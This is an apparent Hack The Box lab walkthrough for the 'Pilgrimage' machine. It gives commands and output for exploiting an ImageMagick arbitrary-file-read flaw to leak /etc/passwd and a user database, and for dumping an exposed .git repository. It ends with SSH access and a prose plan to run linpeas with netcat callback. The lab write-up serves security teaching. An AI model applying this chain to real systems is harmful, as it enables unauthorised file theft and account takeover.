HTB Pilgrimage Walkthrough

Search for flags using tools like nmap and ImageMagick, identify vulnerabilities, exploit them, find user credentials, and capture flags. Happy hacking the box!

HTB Pilgrimage Walkthrough
This image was created using Microsoft Copilot.

There is nothing particular to report about this BOX, which, despite its simplicity, manages to give satisfaction at every moment of the investigation. Let's go immediately to go in search of flags.

Let's start with the nmap scan.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-09 10:52 CEST
Nmap scan report for 10.10.11.219
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_  256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.09 seconds

A classical HTB BOX. Add domain "pilgrimage.htb" to the /etc/hosts file.

It seems to be a portal that reduces images (or processes them anyway). There is the possibility to register and maintain a personal dashboard where all the images shrinked up to that moment are kept. Let's try to analyze one of the images elaborated by the portal.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.219 - Pilgrimage (lin)/attack/dwnl]
└─$ exif 64aa80ee11e1f.png             
Corrupt data
The data provided does not follow the specification.                                                                                 
ExifLoader: The data supplied does not seem to contain EXIF data.                                                                    

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.219 - Pilgrimage (lin)/attack/dwnl]
└─$ identify -verbose 64aa80ee11e1f.png 
Image:
  Filename: 64aa80ee11e1f.png
  Format: PNG (Portable Network Graphics)
  Mime type: image/png
  Class: DirectClass
  Geometry: 184x321+0+0
  Resolution: 37.8x37.8
  Print size: 4.86772x8.49206
  Units: PixelsPerCentimeter
  Colorspace: sRGB
  Type: TrueColor
  Base type: Undefined
  Endianness: Undefined
  Depth: 8-bit
  Channel depth:
    red: 8-bit
    green: 8-bit
    blue: 8-bit
  Channel statistics:
    Pixels: 59064
    Red:
      min: 25  (0.0980392)
      max: 255 (1)
      mean: 165.651 (0.649612)
      standard deviation: 64.5314 (0.253065)
      kurtosis: -1.03005
      skewness: -0.581205
      entropy: 0.937072
    Green:
      min: 9  (0.0352941)
      max: 237 (0.929412)
      mean: 140.666 (0.551632)
      standard deviation: 62.6611 (0.24573)
      kurtosis: -1.1096
      skewness: -0.461928
      entropy: 0.930817
    Blue:
      min: 0  (0)
      max: 210 (0.823529)
      mean: 106.895 (0.419198)
      standard deviation: 52.2698 (0.20498)
      kurtosis: -1.13084
      skewness: -0.456009
      entropy: 0.925638
  Image statistics:
    Overall:
      min: 0  (0)
      max: 255 (1)
      mean: 137.738 (0.540147)
      standard deviation: 59.8208 (0.234591)
      kurtosis: -1.03614
      skewness: -0.260933
      entropy: 0.931176
  Rendering intent: Perceptual
  Gamma: 0.45455
  Chromaticity:
    red primary: (0.64,0.33)
    green primary: (0.3,0.6)
    blue primary: (0.15,0.06)
    white point: (0.3127,0.329)
  Background color: white
  Border color: srgb(223,223,223)
  Matte color: grey74
  Transparent color: black
  Interlace: None
  Intensity: Undefined
  Compose: Over
  Page geometry: 184x321+0+0
  Dispose: Undefined
  Iterations: 0
  Compression: Zip
  Orientation: Undefined
  Properties:
    date:create: 2023-07-09T09:44:38+00:00
    date:modify: 2023-07-09T09:42:06+00:00
    date:timestamp: 2023-07-09T09:42:06+00:00
    png:bKGD: chunk was found (see Background color, above)
    png:cHRM: chunk was found (see Chromaticity, above)
    png:gAMA: gamma=0.45455 (See Gamma, above)
    png:IHDR.bit-depth-orig: 8
    png:IHDR.bit_depth: 8
    png:IHDR.color-type-orig: 2
    png:IHDR.color_type: 2 (Truecolor)
    png:IHDR.interlace_method: 0 (Not interlaced)
    png:IHDR.width,height: 184, 321
    png:pHYs: x_res=3780, y_res=3780, units=1
    png:sRGB: intent=0 (Perceptual Intent)
    png:text: 3 tEXt/zTXt/iTXt chunks were found
    png:tIME: 2023-07-09T09:42:06Z
    signature: d4a0c4b8b3bb98ac0b6c6494c2e0df59b50d32fe7dfbffa554e21c8b33797efe
  Artifacts:
    filename: 64aa80ee11e1f.png
    verbose: true
  Tainted: False
  Filesize: 91683B
  Number pixels: 59064
  Pixels per second: 10.2956MB
  User time: 0.000u
  Elapsed time: 0:01.005
  Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org

The absence of the exif information may not even indicate anything. The only interesting information could be the tool used to resize the image: ImageMagick 6.9.11-60. I will investigate this later, let's see, rather, if there is any injection on the filename that is passed to the tool, traversal path or similar; it's burpsuite time.

It also occurred to me that a traversal path might be present on the file returned after the manipulation. After searching with the first manual tests, I rely on a more suitable tool like dotdotpwn.

Let's go back to the resize tool, ImageMagick, and look for some exploits.

Searching for "ImageMagick 6.9.11 exploit" I found a lot of DoS attacks, but nothing useful for me. In addition, there are also a lot of interesting exploit:

ImageMagick 7.1.0-49 - Arbitrary File Read
ImageMagick 7.1.0-49 - Arbitrary File Read. CVE-2022-44268 . local exploit for Multiple platform

The tool generates an image containing some code that ImageMagick interprets and executes. In this case, it fetches the /etc/passwd file and puts it in the information of the resized file. Let's see if and how it works.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268]
└─$ cargo run "/etc/passwd"   
    Updating crates.io index
  Downloaded bitflags v1.3.2
  Downloaded adler v1.0.2
  Downloaded cfg-if v1.0.0
  Downloaded hex v0.4.3
  Downloaded flate2 v1.0.25
  Downloaded miniz_oxide v0.6.2
  Downloaded png v0.17.7
  Downloaded crc32fast v1.3.2
  Downloaded 8 crates (301.4 KB) in 0.85s
   Compiling crc32fast v1.3.2
   Compiling cfg-if v1.0.0
   Compiling adler v1.0.2
   Compiling bitflags v1.3.2
   Compiling hex v0.4.3
   Compiling miniz_oxide v0.6.2
   Compiling flate2 v1.0.25
   Compiling png v0.17.7
   Compiling cve-2022-44268 v0.1.0 (/home/in7rud3r/Dropbox/hackthebox/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268)
    Finished dev [unoptimized + debuginfo] target(s) in 51.27s
     Running `target/debug/cve-2022-44268 /etc/passwd`

Our payload is ready. Let's feed it to the portal and see what happens. Let's get the resized image...

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268]
└─$ wget http://pilgrimage.htb/shrunk/64bb98f77ea8a.png
--2023-07-22 10:53:27--  http://pilgrimage.htb/shrunk/64bb98f77ea8a.png
Resolving pilgrimage.htb (pilgrimage.htb)... 10.10.11.219
Connecting to pilgrimage.htb (pilgrimage.htb)|10.10.11.219|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1080 (1.1K) [image/png]
Saving to: ‘64bb98f77ea8a.png’

64bb98f77ea8a.png                 100%[==========================================================>]   1.05K  --.-KB/s    in 0s      

2023-07-22 10:53:28 (104 MB/s) - ‘64bb98f77ea8a.png’ saved [1080/1080]

...and let's take a closer look!

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268]
└─$ identify -verbose 64bb98f77ea8a.png 
Image:
  Filename: 64bb98f77ea8a.png
  Format: PNG (Portable Network Graphics)
  Mime type: image/png
  Class: PseudoClass
  Geometry: 100x100+0+0
  Units: Undefined
  Colorspace: sRGB
  Type: Palette
  Base type: Undefined
  Endianness: Undefined
  Depth: 8/1-bit
  Channel depth:
    red: 1-bit
    green: 1-bit
    blue: 1-bit
  Channel statistics:
    Pixels: 10000
    Red:
      min: 255  (1)
      max: 255 (1)
      mean: 255 (1)
      standard deviation: 0 (0)
      kurtosis: 8.192e+51
      skewness: 1e+36
      entropy: 0
    Green:
      min: 0  (0)
      max: 0 (0)
      mean: 0 (0)
      standard deviation: 0 (0)
      kurtosis: -3
      skewness: 0
      entropy: 0
    Blue:
      min: 0  (0)
      max: 0 (0)
      mean: 0 (0)
      standard deviation: 0 (0)
      kurtosis: -3
      skewness: 0
      entropy: 0
  Image statistics:
    Overall:
      min: 0  (0)
      max: 255 (1)
      mean: 85 (0.333333)
      standard deviation: 0 (0)
      kurtosis: -1.5001
      skewness: 0.707071
      entropy: 0
  Colors: 1
  Histogram:
    10000: (255,0,0) #FF0000 red
  Colormap entries: 2
  Colormap:
    0: (255,0,0) #FF0000 red
    1: (255,255,255) #FFFFFF white
  Rendering intent: Perceptual
  Gamma: 0.45455
  Chromaticity:
    red primary: (0.64,0.33)
    green primary: (0.3,0.6)
    blue primary: (0.15,0.06)
    white point: (0.3127,0.329)
  Background color: srgb(99.6124%,99.6124%,99.6124%)
  Border color: srgb(223,223,223)
  Matte color: grey74
  Transparent color: black
  Interlace: None
  Intensity: Undefined
  Compose: Over
  Page geometry: 100x100+0+0
  Dispose: Undefined
  Iterations: 0
  Compression: Zip
  Orientation: Undefined
  Properties:
    date:create: 2023-07-22T08:53:28+00:00
    date:modify: 2023-07-22T08:53:11+00:00
    date:timestamp: 2023-07-22T08:53:11+00:00
    png:bKGD: chunk was found (see Background color, above)
    png:cHRM: chunk was found (see Chromaticity, above)
    png:gAMA: gamma=0.45455 (See Gamma, above)
    png:IHDR.bit-depth-orig: 1
    png:IHDR.bit_depth: 1
    png:IHDR.color-type-orig: 3
    png:IHDR.color_type: 3 (Indexed)
    png:IHDR.interlace_method: 0 (Not interlaced)
    png:IHDR.width,height: 100, 100
    png:PLTE.number_colors: 2
    png:sRGB: intent=0 (Perceptual Intent)
    png:text: 4 tEXt/zTXt/iTXt chunks were found
    png:tIME: 2023-07-22T08:53:11Z
    Raw profile type: 

    1437
726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a6461656d
6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e3a2f7573722f7362696e2f
6e6f6c6f67696e0a62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e
2f6e6f6c6f67696e0a7379733a783a333a333a7379733a2f6465763a2f7573722f736269
6e2f6e6f6c6f67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f
62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f7573722f67616d
65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e3a783a363a31323a6d616e3a
2f7661722f63616368652f6d616e3a2f7573722f7362696e2f6e6f6c6f67696e0a6c703a
783a373a373a6c703a2f7661722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d61696c3a783a383a383a6d61696c3a2f7661722f6d61696c3a2f757372
2f7362696e2f6e6f6c6f67696e0a6e6577733a783a393a393a6e6577733a2f7661722f73
706f6f6c2f6e6577733a2f7573722f7362696e2f6e6f6c6f67696e0a757563703a783a31
303a31303a757563703a2f7661722f73706f6f6c2f757563703a2f7573722f7362696e2f
6e6f6c6f67696e0a70726f78793a783a31333a31333a70726f78793a2f62696e3a2f7573
722f7362696e2f6e6f6c6f67696e0a7777772d646174613a783a33333a33333a7777772d
646174613a2f7661722f7777773a2f7573722f7362696e2f6e6f6c6f67696e0a6261636b
75703a783a33343a33343a6261636b75703a2f7661722f6261636b7570733a2f7573722f
7362696e2f6e6f6c6f67696e0a6c6973743a783a33383a33383a4d61696c696e67204c69
7374204d616e616765723a2f7661722f6c6973743a2f7573722f7362696e2f6e6f6c6f67
696e0a6972633a783a33393a33393a697263643a2f72756e2f697263643a2f7573722f73
62696e2f6e6f6c6f67696e0a676e6174733a783a34313a34313a476e617473204275672d
5265706f7274696e672053797374656d202861646d696e293a2f7661722f6c69622f676e
6174733a2f7573722f7362696e2f6e6f6c6f67696e0a6e6f626f64793a783a3635353334
3a36353533343a6e6f626f64793a2f6e6f6e6578697374656e743a2f7573722f7362696e
2f6e6f6c6f67696e0a5f6170743a783a3130303a36353533343a3a2f6e6f6e6578697374
656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d6e6574776f72
6b3a783a3130313a3130323a73797374656d64204e6574776f726b204d616e6167656d65
6e742c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e
0a73797374656d642d7265736f6c76653a783a3130323a3130333a73797374656d642052
65736f6c7665722c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d6573736167656275733a783a3130333a3130393a3a2f6e6f6e65786973
74656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d74696d6573
796e633a783a3130343a3131303a73797374656d642054696d652053796e6368726f6e69
7a6174696f6e2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c
6f67696e0a656d696c793a783a313030303a313030303a656d696c792c2c2c3a2f686f6d
652f656d696c793a2f62696e2f626173680a73797374656d642d636f726564756d703a78
3a3939393a3939393a73797374656d6420436f72652044756d7065723a2f3a2f7573722f
7362696e2f6e6f6c6f67696e0a737368643a783a3130353a36353533343a3a2f72756e2f
737368643a2f7573722f7362696e2f6e6f6c6f67696e0a5f6c617572656c3a783a393938
3a3939383a3a2f7661722f6c6f672f6c617572656c3a2f62696e2f66616c73650a

    signature: d02a8da86fec6ef80c209c8437c76cf8fbecb6528cd7ba95ef93eecc52a171c7
  Artifacts:
    filename: 64bb98f77ea8a.png
    verbose: true
  Tainted: False
  Filesize: 1080B
  Number pixels: 10000
  Pixels per second: 8.2415MB
  User time: 0.000u
  Elapsed time: 0:01.001
  Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org

...convert the hexadecimal string into something readable...

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268]
└─$ python3 -c 'print(bytes.fromhex("726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a6461656d6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e3a2f7573722f7362696e2f6e6f6c6f67696e0a62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e2f6e6f6c6f67696e0a7379733a783a333a333a7379733a2f6465763a2f7573722f7362696e2f6e6f6c6f67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f7573722f67616d65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e3a783a363a31323a6d616e3a2f7661722f63616368652f6d616e3a2f7573722f7362696e2f6e6f6c6f67696e0a6c703a783a373a373a6c703a2f7661722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f6c6f67696e0a6d61696c3a783a383a383a6d61696c3a2f7661722f6d61696c3a2f7573722f7362696e2f6e6f6c6f67696e0a6e6577733a783a393a393a6e6577733a2f7661722f73706f6f6c2f6e6577733a2f7573722f7362696e2f6e6f6c6f67696e0a757563703a783a31303a31303a757563703a2f7661722f73706f6f6c2f757563703a2f7573722f7362696e2f6e6f6c6f67696e0a70726f78793a783a31333a31333a70726f78793a2f62696e3a2f7573722f7362696e2f6e6f6c6f67696e0a7777772d646174613a783a33333a33333a7777772d646174613a2f7661722f7777773a2f7573722f7362696e2f6e6f6c6f67696e0a6261636b75703a783a33343a33343a6261636b75703a2f7661722f6261636b7570733a2f7573722f7362696e2f6e6f6c6f67696e0a6c6973743a783a33383a33383a4d61696c696e67204c697374204d616e616765723a2f7661722f6c6973743a2f7573722f7362696e2f6e6f6c6f67696e0a6972633a783a33393a33393a697263643a2f72756e2f697263643a2f7573722f7362696e2f6e6f6c6f67696e0a676e6174733a783a34313a34313a476e617473204275672d5265706f7274696e672053797374656d202861646d696e293a2f7661722f6c69622f676e6174733a2f7573722f7362696e2f6e6f6c6f67696e0a6e6f626f64793a783a36353533343a36353533343a6e6f626f64793a2f6e6f6e6578697374656e743a2f7573722f7362696e2f6e6f6c6f67696e0a5f6170743a783a3130303a36353533343a3a2f6e6f6e6578697374656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d6e6574776f726b3a783a3130313a3130323a73797374656d64204e6574776f726b204d616e6167656d656e742c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d7265736f6c76653a783a3130323a3130333a73797374656d64205265736f6c7665722c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e0a6d6573736167656275733a783a3130333a3130393a3a2f6e6f6e6578697374656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d74696d6573796e633a783a3130343a3131303a73797374656d642054696d652053796e6368726f6e697a6174696f6e2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e0a656d696c793a783a313030303a313030303a656d696c792c2c2c3a2f686f6d652f656d696c793a2f62696e2f626173680a73797374656d642d636f726564756d703a783a3939393a3939393a73797374656d6420436f72652044756d7065723a2f3a2f7573722f7362696e2f6e6f6c6f67696e0a737368643a783a3130353a36353533343a3a2f72756e2f737368643a2f7573722f7362696e2f6e6f6c6f67696e0a5f6c617572656c3a783a3939383a3939383a3a2f7661722f6c6f672f6c617572656c3a2f62696e2f66616c73650a"))'
b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:109::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nemily:x:1000:1000:emily,,,:/home/emily:/bin/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n_laurel:x:998:998::/var/log/laurel:/bin/false\n'

Finally, format it again in a readable format known to us.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

Save the result to a file and see which users have a valid shell to use.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268]
└─$ grep -v nologin remote_passwd 
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false

Our victim appears to be emily. Let's see if she has a valid id_rsa file so she can connect. Same process as before, but let's go and recover a different file.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268]
└─$ cargo run "/home/emily/.ssh/id_rsa"
    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
     Running `target/debug/cve-2022-44268 /home/emily/.ssh/id_rsa`

This time, we are not so lucky, but we can still try to reach the flag in the meantime and then try to recover the account credentials.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268]
└─$ cargo run "/home/emily/user.txt"                   
    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
     Running `target/debug/cve-2022-44268 /home/emily/user.txt`

But strangely, nothing comes out. Mmmm... rights issues? It can't be. Maybe I'm missing something!
The nginx config file suggests only where the root folder of the portal was located but nothing else.

From the forum, I read some interesting posts!
"Pro tip: Dirbuster doesn’t finds git repositories"
A dirb session is needed.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/CVE-2022-44268]
└─$ dirb http://pilgrimage.htb/                                                                      

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 22 12:41:43 2023
URL_BASE: http://pilgrimage.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://pilgrimage.htb/ ----
+ http://pilgrimage.htb/.git/HEAD (CODE:200|SIZE:23)                                                                                
==> DIRECTORY: http://pilgrimage.htb/assets/                                                                                        
+ http://pilgrimage.htb/index.php (CODE:200|SIZE:7621)                                                                              
==> DIRECTORY: http://pilgrimage.htb/tmp/                                                                                           
==> DIRECTORY: http://pilgrimage.htb/vendor/                                                                                        
[...]

It seems to be a git repository. How can I download it?

Searching for "download git repository from a website"...

GitHub - arthaud/git-dumper: A tool to dump a git repository from a website
A tool to dump a git repository from a website. Contribute to arthaud/git-dumper development by creating an account on GitHub.
┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/git/git-dumper]
└─$ /home/in7rud3r/.local/bin/git-dumper http://pilgrimage.htb/.git ../../dwnl/git_repo          
[-] Testing http://pilgrimage.htb/.git/HEAD [200]
[-] Testing http://pilgrimage.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://pilgrimage.htb/.gitignore [404]
[-] http://pilgrimage.htb/.gitignore responded with status code 404
[-] Fetching http://pilgrimage.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://pilgrimage.htb/.git/description [200]
[...]
[-] http://pilgrimage.htb/.git/refs/remotes/origin/master responded with status code 404
[-] Fetching http://pilgrimage.htb/.git/refs/wip/index/refs/heads/master [404]
[-] Fetching http://pilgrimage.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] http://pilgrimage.htb/.git/refs/wip/index/refs/heads/master responded with status code 404
[-] http://pilgrimage.htb/.git/refs/wip/wtree/refs/heads/master responded with status code 404
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://pilgrimage.htb/.git/objects/2f/9156e434cfa6204c9d48733ee5c0d86a8a4e23 [200]
[...]
[-] Fetching http://pilgrimage.htb/.git/objects/23/1150acdd01bbbef94dfb9da9f79476bfbb16fc [200]
[-] Fetching http://pilgrimage.htb/.git/objects/ca/d9dfca08306027b234ddc2166c838de9301487 [200]
[-] Fetching http://pilgrimage.htb/.git/objects/f1/8fa9173e9f7c1b2f30f3d20c4a303e18d88548 [200]
[-] Running git checkout .

Perfect. Let's see what's interesting inside this repository.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/dwnl/git_repo]
└─$ ls -la           
total 26972
drwxr-xr-x 5 in7rud3r in7rud3r     4096 Jul 22 13:15 .
drwxr-xr-x 3 in7rud3r in7rud3r     4096 Jul 22 13:15 ..
drwxr-xr-x 6 in7rud3r in7rud3r     4096 Jul 22 13:15 assets
-rwxr-xr-x 1 in7rud3r in7rud3r     5538 Jul 22 13:15 dashboard.php
drwxr-xr-x 7 in7rud3r in7rud3r     4096 Jul 22 13:15 .git
-rwxr-xr-x 1 in7rud3r in7rud3r     9250 Jul 22 13:15 index.php
-rwxr-xr-x 1 in7rud3r in7rud3r     6822 Jul 22 13:15 login.php
-rwxr-xr-x 1 in7rud3r in7rud3r       98 Jul 22 13:15 logout.php
-rwxr-xr-x 1 in7rud3r in7rud3r 27555008 Jul 22 13:15 magick
-rwxr-xr-x 1 in7rud3r in7rud3r     6836 Jul 22 13:15 register.php
drwxr-xr-x 4 in7rud3r in7rud3r     4096 Jul 22 13:15 vendor

When starting to investigate the repo, I found this piece of code:

[...]
  $db = new PDO('sqlite:/var/db/pilgrimage');
  $stmt = $db->prepare("SELECT * FROM users WHERE username = ? and password = ?");
  $stmt->execute(array($username,$password));
[...]

It could be an interesting file. Let's try to download it with the previous exploit. The file is there and it comes down relatively well, but the size is quite large and the format is not the best, with a little patience and a little cleaning, I find the word emily inside the file and next to it what appears to be a password.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.219 - Pilgrimage (lin)/attack/dwnl/git_repo]
└─$ ssh [email protected]
The authenticity of host '10.10.11.219 (10.10.11.219)' can't be established.
ED25519 key fingerprint is SHA256:uaiHXGDnyKgs1xFxqBduddalajktO+mnpNkqx/HjsBw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.219' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jul 22 20:47:03 2023 from 10.10.14.82
emily@pilgrimage:~$ ls -la
total 3880
drwxr-xr-x 5 emily emily    4096 Jul 22 20:50 .
drwxr-xr-x 3 root  root     4096 Jun  8 00:10 ..
-rw-r--r-- 1 emily emily  825220 Jul 22 20:47 2.png
-rw-r--r-- 1 emily emily    1575 Jul 22 20:16 64bbac8ae983f.png
lrwxrwxrwx 1 emily emily       9 Feb 10 13:42 .bash_history -> /dev/null
-rw-r--r-- 1 emily emily     220 Feb 10 13:41 .bash_logout
-rw-r--r-- 1 emily emily    3526 Feb 10 13:41 .bashrc
-rw-r--r-- 1 emily emily    2627 Jul 22 18:34 binexploit.py
-rw-r--r-- 1 emily emily    2257 Jul 22 20:35 binwalk_exploit.png
-rw-r--r-- 1 emily emily    2334 Jul 22 19:08 binwalk_exploit.png.1
drwxr-xr-x 3 emily emily    4096 Jun  8 00:10 .config
-rw-r--r-- 1 emily emily      44 Jun  1 19:15 .gitconfig
-rw-r--r-- 1 emily emily    1653 Jul 22 19:06 imager.png
-rw-r--r-- 1 emily emily    1240 Jul 22 17:17 img.png
drwxr-xr-x 3 emily emily    4096 Jun  8 00:10 .local
-rw-r--r-- 1 emily emily     807 Feb 10 13:41 .profile
-rwxr-xr-x 1 emily emily 3078592 Mar  3 04:51 pspy64
-rw-r----- 1 root  emily      33 Jul 22 18:20 user.txt
drwxr-xr-x 2 emily emily    4096 Jul 22 21:09 ysf
emily@pilgrimage:~$ cat user.txt 
e******************************d

And we earned the first flag! Let's see if there's something easy for privesc to root.

emily@pilgrimage:~$ sudo -l
[sudo] password for emily: 
Sorry, user emily may not run sudo on pilgrimage.

It seems it won't be that easy. I will have to avail myself of the benefits of linpeas, but I see quite a lot of files left by other "visitors" which be the case before restarting the BOX.

As you can find in detail in my other articles, just download the latest version of linpeas.sh, start a session of a native web server (like the php one) on your IP address (this is to reach the linpeas script on your machine from the BOX via http), start a netcat session on an arbitrary port (different from that of the web server) in order to receive the output of the linpeas scan (obviously redirect the output to a file) and finally start the download of the script from the BOX and run it on the fly, also redirecting the output to the netcat listening on your machine. I hope I was clear. If not, I invite you to read some of my other articles, in which this process is described in detail with the commands to be executed.

